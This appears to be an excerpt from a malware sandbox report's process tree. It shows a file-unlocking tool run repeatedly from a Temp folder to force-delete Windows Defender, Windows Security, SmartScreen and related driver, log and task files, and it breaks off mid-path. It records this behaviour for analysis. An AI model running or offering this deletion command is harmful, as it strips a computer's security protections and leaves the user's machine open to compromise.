                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                                                                        PID:6012
                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                                                                          PID:3296
                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                                                                            PID:4680
                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                            10⤵
                                                                                                                                                                                                                                                              PID:6088
                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                              10⤵
                                                                                                                                                                                                                                                                PID:1260
                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                10⤵
                                                                                                                                                                                                                                                                  PID:5636
                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                                                                                    PID:3144
                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                                                                                      PID:5180
                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                                                                                        PID:2984
                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                                                                                          PID:3468
                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows 